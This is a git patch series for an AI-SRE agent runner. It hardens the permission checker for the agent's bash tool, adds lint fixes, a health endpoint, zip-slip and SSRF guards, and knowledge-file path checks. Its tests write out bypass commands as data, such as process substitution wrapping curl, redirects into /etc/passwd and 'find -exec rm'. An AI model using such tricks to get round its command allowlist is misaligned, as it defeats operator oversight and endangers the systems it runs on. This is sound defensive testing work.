+	parser := syntax.NewParser()
+	if f, err := parser.Parse(strings.NewReader(s), ""); err == nil {
+		printed := strings.TrimRight(nodeToString(f), "\n")
+		if printed != "" {
+			return collapseWS(printed)
+		}
+	}
+	return collapseWS(s)
+}
+
+// collapseWS collapses any run of ASCII whitespace into a single space.
+// Used so that rule patterns and command projections agree even when one
+// side has been formatted differently.
+func collapseWS(s string) string {
+	var sb strings.Builder
+	sb.Grow(len(s))
+	prevSpace := false
+	for _, r := range s {
+		if r == ' ' || r == '\t' || r == '\n' || r == '\r' {
+			if !prevSpace {
+				sb.WriteByte(' ')
+				prevSpace = true
+			}
+			continue
+		}
+		sb.WriteRune(r)
+		prevSpace = false
+	}
+	return strings.TrimSpace(sb.String())
 }
 
-// evaluateRules checks all rules and returns the final action and matched pattern.
+// evaluateRules walks rules in specificity order and returns on first
+// match. If no rule matches, the command is denied.
 func (c *Checker) evaluateRules(command string) (Action, string) {
-	action, pattern := ActionDeny, ""
 	for _, rule := range c.rules {
-		if matched, _ := matchPattern(rule.Pattern, command); matched {
-			action, pattern = rule.Action, rule.Pattern
+		if matched, _ := matchPattern(rule.canonical, command); matched {
+			return rule.Action, rule.Pattern
 		}
 	}
-	return action, pattern
+	return ActionDeny, ""
 }
 
 // denyError creates an error message that lists denied patterns so callers
@@ -164,7 +379,7 @@ func matchPattern(pattern, command string) (bool, error) {
 		return true, nil
 	case !strings.Contains(pattern, "*"):
 		return pattern == command, nil
-	case strings.HasSuffix(pattern, "*"):
+	case strings.HasSuffix(pattern, "*") && !strings.Contains(strings.TrimSuffix(pattern, "*"), "*"):
 		return strings.HasPrefix(command, strings.TrimSuffix(pattern, "*")), nil
 	default:
 		return doublestar.Match(pattern, command)
@@ -183,34 +398,46 @@ func DefaultRules() map[string]string {
 	}
 }
 
-// SafeReadOnlyRules returns rules that allow read-only operations.
+// SafeReadOnlyRules returns rules that allow common read-only operations.
+//
+// Notably absent compared to a naive list:
+//   - "find *" — allowed `find . -delete` and `find . -exec rm`. Specific
+//     safe variants are listed instead, none of which can mutate state.
+//   - "echo *" — allowed `echo x > /etc/passwd`. Write redirects are now
+//     gated by checkRedirect, but plain "echo" is rarely needed for
+//     diagnostics, so it is dropped to stay tight by default.
+//
+// Write redirects are denied unless an explicit allow rule for the synthetic
+// "> target" form is added (e.g. "> /tmp/*").
 func SafeReadOnlyRules() map[string]string {
 	return map[string]string{
-		"*":        "deny",
-		"cat *":    "allow",
-		"head *":   "allow",
-		"tail *":   "allow",
-		"ls *":     "allow",
-		"ls":       "allow",
-		"pwd":      "allow",
-		"whoami":   "allow",
-		"date":     "allow",
-		"echo *":   "allow",
-		"grep *":   "allow",
-		"find *":   "allow",
-		"which *":  "allow",
-		"env":      "allow",
-		"uname *":  "allow",
-		"uname":    "allow",
-		"df *":     "allow",
-		"df":       "allow",
-		"du *":     "allow",
-		"free *":   "allow",
-		"free":     "allow",
-		"uptime":   "allow",
-		"ps *":     "allow",
-		"ps":       "allow",
-		"top -b *": "allow",
+		"*":               "deny",
+		"cat *":           "allow",
+		"head *":          "allow",
+		"tail *":          "allow",
+		"ls *":            "allow",
+		"ls":              "allow",
+		"pwd":             "allow",
+		"whoami":          "allow",
+		"date":            "allow",
+		"grep *":          "allow",
+		"find * -name *":  "allow",
+		"find * -type *":  "allow",
+		"find * -path *":  "allow",
+		"find * -iname *": "allow",
+		"which *":         "allow",
+		"env":             "allow",
+		"uname *":         "allow",
+		"uname":           "allow",
+		"df *":            "allow",
+		"df":              "allow",
+		"du *":            "allow",
+		"free *":          "allow",
+		"free":            "allow",
+		"uptime":          "allow",
+		"ps *":            "allow",
+		"ps":              "allow",
+		"top -b *":        "allow",
 	}
 }
 
diff --git a/permission/permission_test.go b/permission/permission_test.go
index 08d4563..7688057 100644
--- a/permission/permission_test.go
+++ b/permission/permission_test.go
@@ -209,6 +209,198 @@ func TestKubernetesReadOnlyRules(t *testing.T) {
 	assert.False(t, checker.IsAllowed("kubectl exec -it nginx -- bash"))
 }
 
+// TestChecker_ASTBypassHardening covers the bypass scenarios documented
+// in the v3 addendum to the AI-SRE builtin tools refactor plan.
+func TestChecker_ASTBypassHardening(t *testing.T) {
+	tests := []struct {
+		name    string
+		rules   map[string]string
+		command string
+		wantErr bool
+	}{
+		// Process / command substitution must be inspected.
+		{
+			name: "process substitution bypass blocked",
+			rules: map[string]string{
+				"*":      "allow",
+				"curl *": "deny",
+			},
+			command: "cat <(curl evil.com)",
+			wantErr: true,
+		},
+		{
+			name: "command substitution bypass blocked",
+			rules: map[string]string{
+				"*":      "allow",
+				"curl *": "deny",
+			},
+			command: "echo $(curl evil.com)",
+			wantErr: true,
+		},
+		{
+			name: "backtick substitution bypass blocked",
+			rules: map[string]string{
+				"*":      "allow",
+				"curl *": "deny",
+			},
+			command: "echo `curl evil.com`",
+			wantErr: true,
+		},
+		{
+			name: "nested process substitution blocked",
+			rules: map[string]string{
+				"*":      "allow",
+				"curl *": "deny",
+			},
+			command: "diff <(cat a) <(curl evil.com)",
+			wantErr: true,
+		},
+		// Redirect targets must be gated.
+		{
+			name: "write redirect to /etc blocked under read-only rules",
+			rules: SafeReadOnlyRules(),
+			// "echo *" was removed, so this is doubly blocked, but the
+			// redirect-target check is what makes this safe even if echo
+			// were re-allowed.
+			command: "cat /etc/hosts > /etc/passwd",
+			wantErr: true,
+		},
+		{
+			name: "write redirect blocked when no allow rule exists",
+			rules: map[string]string{
+				"*":      "deny",
+				"echo *": "allow",
+			},
+			command: "echo hi > /etc/passwd",
+			wantErr: true,
+		},
+		{
+			name: "append redirect blocked when no allow rule exists",
+			rules: map[string]string{
+				"*":      "deny",
+				"echo *": "allow",
+			},
+			command: "echo hi >> /etc/passwd",
+			wantErr: true,
+		},
+		{
+			name: "write redirect allowed by explicit rule",
+			rules: map[string]string{
+				"*":      "deny",
+				"echo *": "allow",
+				"> *":    "allow",
+			},
+			command: "echo hi > /tmp/foo",
+			wantErr: false,
+		},
+		{
+			name: "read redirect (here-string) is fine",
+			rules: map[string]string{
+				"*":      "deny",
+				"grep *": "allow",
+			},
+			command: "grep foo <<< bar",
+			wantErr: false,
+		},
+		// find arg-walker via removed pattern.
+		{
+			name:    "find -delete blocked",
+			rules:   SafeReadOnlyRules(),
+			command: "find . -delete",
+			wantErr: true,
+		},
+		{
+			name:    "find -exec rm blocked",
+			rules:   SafeReadOnlyRules(),
+			command: "find . -exec rm {} +",
+			wantErr: true,
+		},
+		{
+			name:    "find -name still allowed",
+			rules:   SafeReadOnlyRules(),
+			command: "find . -name *.go",
+			wantErr: false,
+		},
+		// Whitespace normalization.
+		{
+			name: "extra spaces still match",
+			rules: map[string]string{
+				"*":               "deny",
+				"kubectl get *":   "allow",
+			},
+			command: "kubectl  get   pods",
+			wantErr: false,
+		},
+		// Env-prefix normalization.
+		{
+			name: "env prefix does not bypass deny",
+			rules: map[string]string{
+				"*":      "allow",
+				"curl *": "deny",
+			},
+			command: "FOO=bar curl evil.com",
+			wantErr: true,
+		},
+		{
+			name: "env prefix matches program rule",
+			rules: map[string]string{
+				"*":             "deny",
+				"kubectl get *": "allow",
+			},
+			command: "KUBECONFIG=x kubectl get pods",
+			wantErr: false,
+		},
+		// First-match precedence: more specific rule wins regardless of
+		// map iteration order.
+		{
+			name: "first-match precedence: specific deny beats general allow",
+			rules: map[string]string{
+				"*":                "allow",
+				"kubectl *":        "allow",
+				"kubectl delete *": "deny",
+			},
+			command: "kubectl delete pod nginx",
+			wantErr: true,
+		},
+		{
+			name: "first-match precedence: specific allow beats general deny",
+			rules: map[string]string{
+				"*":             "deny",
+				"kubectl *":     "deny",
+				"kubectl get *": "allow",
+			},
+			command: "kubectl get pods",
+			wantErr: false,
+		},
+	}
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			checker := NewChecker(tt.rules)
+			err := checker.Check(tt.command)
+			if tt.wantErr {
+				assert.Error(t, err, "expected command to be denied: %q", tt.command)
+			} else {
+				assert.NoError(t, err, "expected command to be allowed: %q", tt.command)
+			}
+		})
+	}
+}
+
+func TestPatternSpecificity(t *testing.T) {
+	// "*" must always sort last; longer literal prefix beats shorter.
+	checker := NewChecker(map[string]string{
+		"*":             "allow",
+		"kubectl *":     "deny",
+		"kubectl get *": "allow",
+	})
+	// kubectl get pods → matches "kubectl get *" (most specific) → allow
+	assert.NoError(t, checker.Check("kubectl get pods"))
+	// kubectl delete pod nginx → falls through to "kubectl *" → deny
+	assert.Error(t, checker.Check("kubectl delete pod nginx"))
+	// rm -rf / → only "*" matches → allow
+	assert.NoError(t, checker.Check("rm -rf /"))
+}
+
 func TestMatchPattern(t *testing.T) {
 	tests := []struct {
 		pattern string
diff --git a/protocol/messages.go b/protocol/messages.go
index 4249501..f7db45b 100644
--- a/protocol/messages.go
+++ b/protocol/messages.go
@@ -157,6 +157,21 @@ type GlobArgs struct {
 type GrepArgs struct {
 	Pattern string   `json:"pattern"`
 	Include []string `json:"include,omitempty"`
+
+	// OutputMode controls the shape of the result: "content" (default — file:line:text rows),
+	// "files_with_matches" (one path per match), or "count" (one path:count per file).
+	OutputMode string `json:"output_mode,omitempty"`
+	// ContextBefore (-B) and ContextAfter (-A) request N lines of context around each match.
+	// Honored by ripgrep only when OutputMode is "content".
+	ContextBefore int `json:"context_before,omitempty"`
+	ContextAfter  int `json:"context_after,omitempty"`
+	// HeadLimit caps the number of result rows returned (post-format). 0 = unlimited.
+	HeadLimit int `json:"head_limit,omitempty"`
+	// FileType maps to ripgrep's --type (e.g., "go", "py", "js"). Ignored by the Go fallback.
+	FileType string `json:"file_type,omitempty"`
+	// CaseSensitive overrides ripgrep's default --smart-case.
+	// nil = smart-case; true = case-sensitive; false = case-insensitive.
+	CaseSensitive *bool `json:"case_sensitive,omitempty"`
 }
 
 // BashArgs are the arguments for bash operation.
@@ -220,16 +235,39 @@ type GrepResult struct {
 	Truncated bool        `json:"truncated,omitempty"`  // Whether content was truncated
 	FilePath  string      `json:"file_path,omitempty"`  // Path to full content if truncated
 	TotalSize int64       `json:"total_size,omitempty"` // Original content size
+	// RegexCompileError surfaces a non-fatal fallback path: the requested pattern failed
+	// to compile as a Go regexp, so the Go fallback walked files matching it as a literal.
+	// Empty when ripgrep handled the request or compilation succeeded.
+	RegexCompileError string `json:"regex_compile_error,omitempty"`
 }
 
 // BashResult is the result of a bash operation.
+//
+// Stdout and stderr are tracked independently — either stream may be truncated
+// and spilled to a separate file. The legacy fields (`Truncated`, `FilePath`,
+// `TotalSize`) mirror the stdout-side fields for backward compatibility with
+// older safari builds; new callers should prefer the stream-specific fields.
 type BashResult struct {
-	Stdout    string `json:"stdout"`
-	Stderr    string `json:"stderr"`
-	ExitCode  int    `json:"exit_code"`
-	Truncated bool   `json:"truncated,omitempty"`  // Whether content was truncated
-	FilePath  string `json:"file_path,omitempty"`  // Path to full content if truncated
-	TotalSize int64  `json:"total_size,omitempty"` // Original content size
+	Stdout   string `json:"stdout"`
+	Stderr   string `json:"stderr"`
+	ExitCode int    `json:"exit_code"`
+
+	// Per-stream truncation metadata. A stream is "truncated" when either
+	// processLargeOutput trimmed it OR the underlying LimitedWriter hit its
+	// hard cap mid-execution (the captured buffer carries an inline marker).
+	TruncatedStdout bool   `json:"truncated_stdout,omitempty"`
+	TruncatedStderr bool   `json:"truncated_stderr,omitempty"`
+	StdoutFilePath  string `json:"stdout_file_path,omitempty"`
+	StderrFilePath  string `json:"stderr_file_path,omitempty"`
+	StdoutTotalSize int64  `json:"stdout_total_size,omitempty"`
+	StderrTotalSize int64  `json:"stderr_total_size,omitempty"`
+
+	// Legacy stdout-only mirrors. Kept so older safari clients that only
+	// parse these still see truncation. New code should read the stream-
+	// specific fields instead.
+	Truncated bool   `json:"truncated,omitempty"`
+	FilePath  string `json:"file_path,omitempty"`
+	TotalSize int64  `json:"total_size,omitempty"`
 }
 
 // WebFetchArgs are the arguments for webfetch operation.

From 07721826fb1fd91ae3babc7b1a8895600710ae4a Mon Sep 17 00:00:00 2001
From: ysyneu <ysyneu@gmail.com>
Date: Sat, 2 May 2026 16:45:57 +0800
Subject: [PATCH 09/11] fix(lint): clear golangci-lint findings + add /health
 endpoint
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

- netsafe: guard http.DefaultTransport type-assertion (errcheck)
- environment: switch if-else chain to switch (gocritic), drop dead err=nil (ineffassign), rename shadowed err vars (govet)
- permission: syntax.ClbOut → syntax.RdrClob (staticcheck SA1019)
- cmd: add /health listener for Tencent AGS readiness probe; bind via ListenConfig.Listen with parent context (noctx) and document the all-interfaces bind (gosec G102)

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 cmd/main.go                   | 36 +++++++++++++++++++++++++++++++++++
 environment/environment.go    | 21 ++++++++++----------
 environment/netsafe.go        |  6 +++++-
 environment/security_test.go  | 10 +++++-----
 permission/permission.go      |  6 +++---
 permission/permission_test.go |  6 +++---
 6 files changed, 63 insertions(+), 22 deletions(-)

diff --git a/cmd/main.go b/cmd/main.go
index 5956afc..6432102 100644
--- a/cmd/main.go
+++ b/cmd/main.go
@@ -5,6 +5,8 @@ import (
 	"context"
 	"fmt"
 	"log/slog"
+	"net"
+	"net/http"
 	"os"
 	"os/signal"
 	"path/filepath"
@@ -38,6 +40,11 @@ var (
 const (
 	defaultURL      = "wss://api.flashcat.cloud/safari/environment/ws"
 	defaultLogLevel = "info"
+	// healthAddr is bound by the runner so cloud sandbox platforms (e.g. Tencent
+	// AGS) can satisfy their HTTP readiness probe — the runner only opens
+	// outbound WebSockets otherwise, leaving no inbound port for the platform
+	// to probe.
+	healthAddr = ":49983"
 )
 
 func main() {
@@ -218,6 +225,8 @@ func runRunner() error {
 	ctx, cancel := context.WithCancel(context.Background())
 	defer cancel()
 
+	startHealthServer(ctx)
+
 	sigCh := make(chan os.Signal, 1)
 	signal.Notify(sigCh, syscall.SIGINT, syscall.SIGTERM)
 
@@ -278,6 +287,33 @@ func setupLogging(levelStr string) {
 	slog.SetDefault(slog.New(handler))
 }
 
+// startHealthServer binds a tiny HTTP listener that always answers /health 200.
+// Required by Tencent AGS (and similar serverless sandbox platforms) which gate
+// instance start on an HTTP readiness probe within ~30s.
+func startHealthServer(ctx context.Context) {
+	// AGS readiness probes hit the pod from outside, so binding to all
+	// interfaces is required — the listener only serves a fixed 200 on /health.
+	var lc net.ListenConfig
+	ln, err := lc.Listen(ctx, "tcp", healthAddr) // #nosec G102 -- intentional: external readiness probe
+
+	if err != nil {
+		slog.Warn("health server skipped (port already in use)", "addr", healthAddr, "err", err)
+		return
+	}
+	mux := http.NewServeMux()
+	mux.HandleFunc("/health", func(w http.ResponseWriter, _ *http.Request) {
+		w.WriteHeader(http.StatusOK)
+		_, _ = w.Write([]byte("ok"))
+	})
+	srv := &http.Server{Handler: mux, ReadHeaderTimeout: 5 * time.Second}
+	go func() {
+		if err := srv.Serve(ln); err != nil && err != http.ErrServerClosed {
+			slog.Warn("health server stopped", "err", err)
+		}
+	}()
+	slog.Info("health server listening", "addr", healthAddr)
+}
+
 func parseLogLevel(levelStr string) slog.Level {
 	switch levelStr {
 	case "debug":
diff --git a/environment/environment.go b/environment/environment.go
index 86c1658..9d1420f 100644
--- a/environment/environment.go
+++ b/environment/environment.go
@@ -650,9 +650,11 @@ func (e *Environment) executeBashCommand(ctx context.Context, command, workdir s
 	err := cmd.Run()
 	exitCode := 0
 	if err != nil {
-		if exitError, ok := err.(*exec.ExitError); ok {
+		var exitError *exec.ExitError
+		switch {
+		case errors.As(err, &exitError):
 			exitCode = exitError.ExitCode()
-		} else if ctx.Err() == context.DeadlineExceeded {
+		case ctx.Err() == context.DeadlineExceeded:
 			res := &protocol.BashResult{
 				Stdout:          stdout.String(),
 				Stderr:          "command timed out",
@@ -663,11 +665,10 @@ func (e *Environment) executeBashCommand(ctx context.Context, command, workdir s
 				res.Truncated = true
 			}
 			return res, nil
-		} else if errors.Is(err, ErrOutputCapped) {
+		case errors.Is(err, ErrOutputCapped):
 			// Command itself didn't fail — only the writer's contract violation
 			// surfaced. Treat as a successful run with capped buffers.
-			err = nil
-		} else {
+		default:
 			return nil, fmt.Errorf("failed to execute command: %w", err)
 		}
 	}
@@ -891,7 +892,7 @@ func (e *Environment) SyncSkill(ctx context.Context, args *protocol.SyncSkillArg
 	// Probe phase: cache hit if .checksum matches AND SKILL.md exists.
 	cachedSum, _ := os.ReadFile(filepath.Join(skillDir, ".checksum"))
 	if string(cachedSum) == args.Checksum {
-		if _, err := os.Stat(filepath.Join(skillDir, "SKILL.md")); err == nil {
+		if _, statErr := os.Stat(filepath.Join(skillDir, "SKILL.md")); statErr == nil {
 			return &protocol.SyncSkillResult{Success: true, Path: skillDir, Cached: true}, nil
 		}
 	}
@@ -923,12 +924,12 @@ func (e *Environment) unzipSkill(data []byte, dest string) error {
 	}
 
 	// Remove existing directory if exists
-	if err := os.RemoveAll(dest); err != nil {
-		return fmt.Errorf("failed to remove existing directory: %w", err)
+	if rmErr := os.RemoveAll(dest); rmErr != nil {
+		return fmt.Errorf("failed to remove existing directory: %w", rmErr)
 	}
 
-	if err := os.MkdirAll(dest, 0o755); err != nil {
-		return fmt.Errorf("failed to create destination directory: %w", err)
+	if mkErr := os.MkdirAll(dest, 0o755); mkErr != nil {
+		return fmt.Errorf("failed to create destination directory: %w", mkErr)
 	}
 
 	// Resolve dest to absolute and append a trailing separator BEFORE the
diff --git a/environment/netsafe.go b/environment/netsafe.go
index e7babd2..74c55b0 100644
--- a/environment/netsafe.go
+++ b/environment/netsafe.go
@@ -143,7 +143,11 @@ func safeDialContext(dialTimeout time.Duration) func(ctx context.Context, networ
 // safeHTTPTransport returns an *http.Transport wired with safeDialContext
 // and sensible pool sizes.
 func safeHTTPTransport(dialTimeout time.Duration) *http.Transport {
-	t := http.DefaultTransport.(*http.Transport).Clone()
+	base, ok := http.DefaultTransport.(*http.Transport)
+	if !ok {
+		base = &http.Transport{}
+	}
+	t := base.Clone()
 	t.DialContext = safeDialContext(dialTimeout)
 	return t
 }
diff --git a/environment/security_test.go b/environment/security_test.go
index c7820ee..527361b 100644
--- a/environment/security_test.go
+++ b/environment/security_test.go
@@ -101,9 +101,9 @@ func TestUnzipSkill_AcceptsBenign(t *testing.T) {
 	env := newTestEnvironment(t)
 	dest := filepath.Join(t.TempDir(), "skills", "ok")
 	zipData := buildTestZip(t, map[string]string{
-		"SKILL.md":         "# hi",
-		"resources/a.txt":  "alpha",
-		"scripts/b.sh":     "#!/bin/sh\n",
+		"SKILL.md":        "# hi",
+		"resources/a.txt": "alpha",
+		"scripts/b.sh":    "#!/bin/sh\n",
 	})
 	require.NoError(t, env.unzipSkill(zipData, dest))
 	for _, rel := range []string{"SKILL.md", "resources/a.txt", "scripts/b.sh"} {
@@ -123,8 +123,8 @@ func TestWebFetch_RefusesSSRFTargets(t *testing.T) {
 	env := newTestEnvironment(t)
 	cases := []string{
 		"http://169.254.169.254/latest/meta-data/", // AWS / Aliyun / GCP IMDS
-		"http://127.0.0.1/",                         // loopback
-		"http://10.0.0.1/",                          // RFC1918
+		"http://127.0.0.1/",                        // loopback
+		"http://10.0.0.1/",                         // RFC1918
 	}
 	for _, raw := range cases {
 		t.Run(raw, func(t *testing.T) {
diff --git a/permission/permission.go b/permission/permission.go
index 6f76ae9..773279f 100644
--- a/permission/permission.go
+++ b/permission/permission.go
@@ -1,6 +1,6 @@
 // Package permission implements glob-based command permission checking.
 //
-// Matching semantics
+// # Matching semantics
 //
 // Rules are evaluated against three normalized projections of every shell
 // command found anywhere in the input — including pipelines, command
@@ -22,7 +22,7 @@
 // shell printer's canonical formatter, so "kubectl  get  pods" matches
 // the rule "kubectl get pods" regardless of spacing.
 //
-// Precedence
+// # Precedence
 //
 // Rules are evaluated in specificity order, and the first match wins.
 // Specificity is "longer literal prefix before any '*' wins"; the catch-all
@@ -279,7 +279,7 @@ func writeRedirectPrefix(op syntax.RedirOperator) string {
 		return ">"
 	case syntax.AppOut:
 		return ">>"
-	case syntax.ClbOut:
+	case syntax.RdrClob:
 		return ">|"
 	case syntax.RdrAll:
 		return "&>"
diff --git a/permission/permission_test.go b/permission/permission_test.go
index 7688057..34b17ac 100644
--- a/permission/permission_test.go
+++ b/permission/permission_test.go
@@ -257,7 +257,7 @@ func TestChecker_ASTBypassHardening(t *testing.T) {
 		},
 		// Redirect targets must be gated.
 		{
-			name: "write redirect to /etc blocked under read-only rules",
+			name:  "write redirect to /etc blocked under read-only rules",
 			rules: SafeReadOnlyRules(),
 			// "echo *" was removed, so this is doubly blocked, but the
 			// redirect-target check is what makes this safe even if echo
@@ -325,8 +325,8 @@ func TestChecker_ASTBypassHardening(t *testing.T) {
 		{
 			name: "extra spaces still match",
 			rules: map[string]string{
-				"*":               "deny",
-				"kubectl get *":   "allow",
+				"*":             "deny",
+				"kubectl get *": "allow",
 			},
 			command: "kubectl  get   pods",
 			wantErr: false,

From d5b5a5d69e3a10ece0de1ef0de568b794169d3fd Mon Sep 17 00:00:00 2001
From: ysyneu <ysyneu@gmail.com>
Date: Sat, 2 May 2026 20:59:45 +0800
Subject: [PATCH 10/11] fix(ci): drop invalid G706 gosec exclude + handle
 unix-abs zip-slip on windows

- .golangci.yml: pinned CI golangci-lint v2.4 rejects G706 under
  gosec.excludes (rule unknown to its gosec). Move suppression to the
  version-safe linters.exclusions.rules text match so both v2.4 and newer
  versions stay quiet. Same regression previously fixed in a60df85.
- environment/unzipSkill: filepath.IsAbs("/etc/passwd") returns false on
  Windows (no drive letter), so the absolute-path guard let the entry
  slip through and TestUnzipSkill_RejectsZipSlip/absolute-path-unix
  failed on windows-latest. Reject leading "/" or "\\" on the raw name
  before Clean normalizes separators.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 .golangci.yml              | 15 ++++++++++-----
 environment/environment.go |  7 +++++++
 2 files changed, 17 insertions(+), 5 deletions(-)

diff --git a/.golangci.yml b/.golangci.yml
index 122e243..22459b2 100644
--- a/.golangci.yml
+++ b/.golangci.yml
@@ -47,15 +47,20 @@ linters:
       # Exclude G301 (directory permissions) - workspace needs readable directories
       # Exclude G304 (file inclusion) - paths are validated via safePath()
       # Exclude G306 (file permissions) - workspace files need to be readable
-      # Exclude G706 (log taint via taint analysis) - slog's structured
-      # key-value logging is not a format-string injection vector; the rule
-      # fires on every slog call that includes a user-controlled value, which
-      # is the whole point of structured logging.
       excludes:
         - G301
         - G304
         - G306
-        - G706
+  exclusions:
+    rules:
+      # G706 (log injection via taint) is added in newer gosec versions and
+      # not in our pinned CI golangci-lint v2.4 — listing it under
+      # gosec.excludes fails `config verify` there. Match by text instead so
+      # newer versions also stay quiet: slog's structured key/value logging
+      # is not a format-string injection vector.
+      - linters:
+          - gosec
+        text: "G706"
 
 formatters:
   enable:
diff --git a/environment/environment.go b/environment/environment.go
index 9d1420f..2291f26 100644
--- a/environment/environment.go
+++ b/environment/environment.go
@@ -950,6 +950,13 @@ func (e *Environment) unzipSkill(data []byte, dest string) error {
 		if strings.Contains(f.Name, "..") {
 			return fmt.Errorf("invalid file path in zip: %s", f.Name)
 		}
+		// Reject leading "/" or "\" on the raw name. filepath.IsAbs is
+		// platform-dependent and misses unix-style "/etc/passwd" on Windows
+		// (no drive letter), so check the raw name before Clean rewrites
+		// separators.
+		if strings.HasPrefix(f.Name, "/") || strings.HasPrefix(f.Name, `\`) {
+			return fmt.Errorf("invalid file path in zip: %s", f.Name)
+		}
 		cleanName := filepath.Clean(f.Name)
 		if strings.HasPrefix(cleanName, "..") || filepath.IsAbs(cleanName) {
 			return fmt.Errorf("invalid file path in zip: %s", f.Name)

From 95ca4c5782c0df68f4766738f591658bfbc758b7 Mon Sep 17 00:00:00 2001
From: ysyneu <ysyneu@gmail.com>
Date: Thu, 7 May 2026 10:26:58 +0800
Subject: [PATCH 11/11] feat(knowledge): reconcile_knowledge_manifest RPC for
 orphan/stale prune + missing-file diff

Adds a per-session RPC so Safari can declare its current view of which
knowledge files should exist (manifest = list of rel_path + sha256). The
runner walks <root>/knowledge/<scope>/, deletes anything not in the
manifest (orphan prune), deletes anything whose sha disagrees with the
sentinel (stale prune), and returns NeedsStage = manifest entries it
doesn't have on disk after the prune step.

Safari uses NeedsStage to drive a follow-up bulk StageKnowledgeFiles so
the full pack lands at session start instead of lazily on first read.
This is what makes ~/.flashduty/knowledge/<scope>/ look like the actual
pack contents (DUTY.md + every runbook) instead of just whatever the LLM
happened to read in the current turn.

Walks the on-disk tree (rather than trusting the sentinel) so manual
operator drops also get reconciled instead of lingering forever. Reuses
the existing sentinel + advisory lock so concurrent stage calls from the
same Safari are safe.

Pairs with fc-safari change wiring BuildManifest +
ReconcileKnowledgeManifest + EagerStageMissing into mw_env.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 environment/knowledge.go      | 191 ++++++++++++++++++++--
 environment/knowledge_test.go | 298 ++++++++++++++++++++++++++++++----
 protocol/messages.go          |  41 ++++-
 ws/handler.go                 |   8 +
 4 files changed, 486 insertions(+), 52 deletions(-)

diff --git a/environment/knowledge.go b/environment/knowledge.go
index 63155ce..455d535 100644
--- a/environment/knowledge.go
+++ b/environment/knowledge.go
@@ -8,11 +8,18 @@ import (
 	"log/slog"
 	"os"
 	"path/filepath"
+	"regexp"
 	"strings"
 
 	"github.com/flashcatcloud/flashduty-runner/protocol"
 )
 
+// teamScopeRe matches the only legal team-scope directory name: `team_` plus
+// one or more digits. Anything else (e.g. `team_42a`, `team_`, `Team_42`) is
+// rejected so the runner can never be tricked into mkdir'ing an attacker-
+// supplied directory name.
+var teamScopeRe = regexp.MustCompile(`^team_\d+$`)
+
 const (
 	// sentinelName is the hidden JSON map that tracks staged-file checksums.
 	// Safari reads this to decide which knowledge pack files are already current.
@@ -21,27 +28,43 @@ const (
 
 // validateKnowledgeRelPath enforces the path rules for knowledge file operations.
 //
-// Rules (from the Safari-side contract):
-//   - Must not contain path separators or double-dot components — the runner
-//     only writes flat files in the workspace root, never in sub-directories.
-//   - Leading-dot filenames are rejected because they are hidden by convention;
-//     the sentinel is written by the runner itself and is never staged by clients.
+// Layout: every staged file lives under `knowledge/<scope>/<leaf>` where
+// scope is `account` or `team_<digits>`. The leading `knowledge/` segment
+// matches the runner-relative form of the read path Safari uses
+// (`<root>/knowledge/<scope>/<leaf>`), so a freshly staged file lands at
+// exactly the location a follow-up read will probe — no contract drift.
+//
+// Bare-leaf paths (`DUTY.md`), deeper trees (`knowledge/account/sub/foo.md`),
+// missing prefix (`account/foo.md`), unknown scope segments, and the
+// sentinel filename are all rejected. Backslashes are blocked to cover the
+// Windows-style traversal vector defensively even though the runner only
+// ships on unix.
 func validateKnowledgeRelPath(relPath string) error {
 	if relPath == "" {
 		return fmt.Errorf("rel_path must not be empty")
 	}
-	if strings.ContainsAny(relPath, `/\`) {
-		return fmt.Errorf("rel_path must not contain path separators: %q", relPath)
+	if strings.ContainsRune(relPath, '\\') {
+		return fmt.Errorf("rel_path must not contain backslash: %q", relPath)
+	}
+	parts := strings.Split(relPath, "/")
+	if len(parts) != 3 {
+		return fmt.Errorf("rel_path must be knowledge/<scope>/<leaf>, got %q", relPath)
+	}
+	root, scope, leaf := parts[0], parts[1], parts[2]
+	if root != "knowledge" {
+		return fmt.Errorf("rel_path must start with 'knowledge/', got %q", relPath)
 	}
-	// Reject the bare ".." token. Slash-separated traversal like "foo/../bar"
-	// is already blocked above, but a plain ".." with no slashes still escapes.
-	if relPath == ".." {
-		return fmt.Errorf("rel_path must not be '..': %q", relPath)
+	if scope != "account" && !teamScopeRe.MatchString(scope) {
+		return fmt.Errorf("rel_path scope must be 'account' or 'team_<digits>', got %q", scope)
 	}
-	if strings.HasPrefix(relPath, ".") {
-		// Hidden files (including the sentinel itself) cannot be staged by clients.
-		// The runner owns the sentinel exclusively.
-		return fmt.Errorf("rel_path must not start with '.': %q", relPath)
+	if leaf == "" || leaf == "." || leaf == ".." {
+		return fmt.Errorf("rel_path leaf must be a real filename, got %q", leaf)
+	}
+	if strings.HasPrefix(leaf, ".") {
+		return fmt.Errorf("rel_path leaf must not start with '.': %q", leaf)
+	}
+	if leaf == sentinelName {
+		return fmt.Errorf("rel_path leaf must not be the sentinel filename")
 	}
 	return nil
 }
@@ -166,6 +189,12 @@ func (e *Environment) StageKnowledgeFiles(ctx context.Context, args *protocol.St
 		}
 
 		targetPath := filepath.Join(e.root, f.RelPath)
+		if err := os.MkdirAll(filepath.Dir(targetPath), 0o755); err != nil {
+			status.Success = false
+			status.Error = fmt.Sprintf("failed to create scope directory: %v", err)
+			result.Files = append(result.Files, status)
+			continue
+		}
 		if err := atomicWriteFile(targetPath, content, 0o644); err != nil {
 			status.Success = false
 			status.Error = err.Error()
@@ -197,6 +226,138 @@ func (e *Environment) StageKnowledgeFiles(ctx context.Context, args *protocol.St
 	return result, nil
 }
 
+// ReconcileKnowledgeManifest reconciles the on-disk knowledge tree against the
+// supplied manifest. Files present on disk but absent from the manifest are
+// orphans (pruned). Files present in the manifest with a checksum that
+// disagrees with the sentinel are stale (also pruned, so the next read
+// triggers a fresh lazy install from Safari). Files whose checksum already
+// matches are left in place.
+//
+// The runner does NOT pre-stage anything in this call: the manifest declares
+// what *should* exist if it were read, not what *must* be cached. Cold packs
+// stay cold; only drift is corrected. The whole pass runs under the sentinel
+// lock so it is safe with concurrent stage calls from the same Safari.
+func (e *Environment) ReconcileKnowledgeManifest(ctx context.Context, args *protocol.ReconcileKnowledgeManifestArgs) (*protocol.ReconcileKnowledgeManifestResult, error) {
+	expected := make(map[string]string, len(args.Files))
+	for _, f := range args.Files {
+		if err := validateKnowledgeRelPath(f.RelPath); err != nil {
